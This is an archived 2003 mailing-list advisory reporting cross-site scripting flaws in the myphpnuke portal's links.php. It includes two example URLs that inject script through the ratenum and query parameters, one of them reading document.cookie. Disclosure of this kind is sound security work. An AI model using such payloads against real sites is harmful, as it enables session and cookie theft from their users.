myphpnuke xss

From: Tacettin Karadeniz (tacettinkaradenizat_private)
Date: Wed Feb 19 2003 - 17:40:10 PST

  • Next message: Mandrake Linux Security Team: "MDKSA-2003:019 - Updated php packages fix buffer overflow vulnerability" 

    Vendor:
http://www.myphpnuke.com

Subject: 
myphpnuke links.php vulnerability

myphpnuke is a website portal tool written in php.
There are many Cross Site Scripting issue on myphpnuke
.

Example:
http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent

http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettinat_private');[/scr!pt]?query=



__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com

    This archive was generated by hypermail 2b30 : Thu Feb 20 2003 - 05:18:11 PST